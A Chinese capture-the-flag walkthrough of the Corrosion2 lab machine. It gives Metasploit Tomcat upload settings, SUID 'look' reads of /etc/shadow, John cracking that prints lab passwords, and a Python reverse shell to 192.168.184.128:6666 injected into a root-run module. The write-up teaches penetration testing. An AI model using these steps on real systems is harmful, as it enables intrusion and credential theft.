Corrosion2实战渗透(二)

简介: Corrosion2实战渗透
使用改模块
use 3


image.png


set HttpPassword melehifokivai
set Httpusername manager
set rhosts 192.168.43.4   
set rport 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
run


image.png


如下图所示成功反弹,获取shell


shell
whoami
uid


image.png


切换用户 jaye 的 shell
进入 meterpreter shell
使用 python 切换 bash
python3 -c 'import pty; pty.spawn("/bin/bash")'


image.png

cd /home
ls
发现两个用户名


image.png


cd /home/randy
ls -la
发现一些文件
cat note.txt


打开note.txt查看

嘿,兰迪,我是你的系统管理员,希望你有美好的一天!我只是想让你知道我更改了你主目录的权限。目前还不能删除或添加文件。


第一个flag,打开user.txt查看

cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6


image.png


由于randy目录下面的文件不能修改,一些关键文件也无法查看,切换到其他用户目录看看

su jaye
melehifokivai   //密码,还是tomcat的密码
成功进入


image.png


查看etc/passwd文件


cat /etc/passwd


image.png


可以使用ssh登录


ssh @192.168.43.4
yes
melehifokivai 


image.png


id
whoami
pwn
ls -la


image.png



发现一些文件,查看files文件夹下面的look文件


cd Files
ls -la
cat look
file look
which look


image.png



是系统的look命令,look命令可以越权访问

https://gtfobins.github.io/gtfobins/look/),


cat /etc/passwd
LFILE=/etc/passwd
./look '' "$LFILE"


image.png


 

将/etc/shadow文件复制下来

注意:这里也可以直接查看flag。    ——  —— >>>>         ./look '' /root/root.txt

将/etc/passwd文件复制下来


image.png


将以上两个文件保存到本地


vim passwd
vim shadow
unshadow passwd shadow > pssword.txt
爆破
john --wordlist=/usr/share/wordlists/rockyou.txt ./password.txt 


image.png


破解出第一个账号密码(若干小时.........)


melehifokivai    (jaye)


image.png


破解出第二个账号密码(若干小时..........)

07051986randy (randy)


image.png


第二个flag


第一个账号已经找到相关内容,现在登录第二个账号

su randy
07051986randy
登录成功,进入账号


image.png


cd ..
ls
cd randy
ls -la


image.png

sudo -l
07051986randy


image.png


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binl:/snap/bin用户randy可以执行以下命令:(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py


image.png


root会执行该文件,并且引用了base64模块


image.png


打开查看base64模块


cd /usr/bin/python3.8
ls -la base64.py
vi base64.py


image.png


插入以下shell     参考以下大佬博客

https://blog.csdn.net/Perpetual_Blue/article/details/124245059?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_title~default-0-124245059-blog-122969392.pc_relevant_aa&spm=1001.2101.3001.4242.1&utm_relevant_index=3书签:靶机渗透练习37-Corrosion2_hirak0的博客-CSDN博客


import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.184.128",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
import pty;
pty.spawn("/bin/bash")


image.png


命令行模式下执行:
set nobackup
set nowritebackup
set noswapfile
wq

在被攻击机上执行命令:sudo /usr/bin/python3.8 /home/randy/randombase64.py输入密码:07051986randy

执行之后,可以看到 nc 反弹 shell 成功,为 root 权限

网络图片:https://ucc.alicdn.com/images/user-upload-01/img_convert/e949a09c35c899402e11eb34f80fcb19.png


2fdbf8d4f894292361d6c72c8e833a4b


方法二:利用./look获取flag


ssh jaye@192.168.43.4                                               
jaye@192.168.43.4's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.11.0-34-generic x86_64)
......
$ pwd
/home/jaye
$ cd ..
$ ls
jaye  randy
$ cd ~
$ ls -la
total 92
drwxr-x--x 18 jaye jaye 4096 Aug  2 23:38 .
drwxr-xr-x  4 root root 4096 Sep 17  2021 ..
-rw-r--r--  1 root root    0 Sep 17  2021 .bash_history
-rw-r--r--  1 jaye jaye  220 Feb 25  2020 .bash_logout
-rw-r--r--  1 jaye jaye 3771 Feb 25  2020 .bashrc
drwx------ 12 jaye jaye 4096 Sep 17  2021 .cache
drwx------ 11 jaye jaye 4096 Sep 17  2021 .config
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Desktop
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Documents
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Downloads
drwxr-xr-x  2 root root 4096 Sep 17  2021 Files
drwx------  3 jaye jaye 4096 Sep 17  2021 .gnupg
drwxr-xr-x  3 jaye jaye 4096 Sep 17  2021 .local
drwx------  5 jaye jaye 4096 Sep 17  2021 .mozilla
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Music
-rw-rw-r--  1 jaye jaye 2929 Aug  2 23:35 passwd
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Pictures
-rw-r--r--  1 jaye jaye  807 Feb 25  2020 .profile
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Public
-rw-rw-r--  1 jaye jaye 1827 Aug  2 23:37 shadow
drwxr-xr-x  3 jaye jaye 4096 Sep 17  2021 snap
drwx------  2 jaye jaye 4096 Sep 17  2021 .ssh
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Templates
-rw-rw-r--  1 jaye jaye    0 Aug  2 23:38 userpass.txt
drwxr-xr-x  2 jaye jaye 4096 Sep 17  2021 Videos
$ cd Files
$ ls -la
total 24
drwxr-xr-x  2 root root  4096 Sep 17  2021 .
drwxr-x--x 18 jaye jaye  4096 Aug  2 23:38 ..
---s--s--x  1 root root 14728 Sep 17  2021 look
./look '' '/root/root.txt'


image.png

image.png

image.png


总结:


前期渗透思路和一般的方式一样,都是主机发现,端口扫描,更具端口查看服务

探测端口下面的目录  80    8080

8080下面发现突破点文件  

解压破解获得tomcat账号密码

tomcat登录上传war包反弹失败

使用msf下面的tomcat上传漏洞获取shell

查看文件  发现两个账号

登录randy    发现第一个flag

破解第二个账号密码

登录提权  获取第二个flag


相关文章
|
SQL 安全 前端开发
最近的一次渗透
最近的一次渗透
|
3月前
|
SQL 安全 测试技术
Web安全-渗透基础
Web安全-渗透基础
39 1
|
7月前
|
缓存 监控 安全
近源渗透
近源渗透
259 1
近源渗透
|
7月前
|
安全 应用服务中间件 PHP
黑客渗透知识点总结
黑客渗透知识点总结
|
安全 NoSQL Shell
梦中的一次渗透
昨天晚上一直做梦,今天就把昨天梦中的事情记录下来,本故事纯属虚构,如有雷同纯属巧合
83 0
|
安全 数据安全/隐私保护
网站渗透思路总结
网站渗透思路总结
120 0
|
Go 数据安全/隐私保护
某教程学习笔记(一):21、后渗透攻击
某教程学习笔记(一):21、后渗透攻击
139 0
某教程学习笔记(一):21、后渗透攻击
|
SQL 安全 API
【实战案例】——实战渗透某不法网站
很多同学在靶场,ctf题中取得了很大的进步和收获,但是在实战环境下这些知识却不一定好用,所以新开了一个专栏介绍博主遇到的一些比较有意思的实战环境和渗透流程,希望对大家有所帮助
146 0
【实战案例】——实战渗透某不法网站
|
安全 网络协议 Ubuntu
|
SQL 运维 安全
安全渗透环境准备_1 | 学习笔记
快速学习 安全渗透环境准备_1
139 0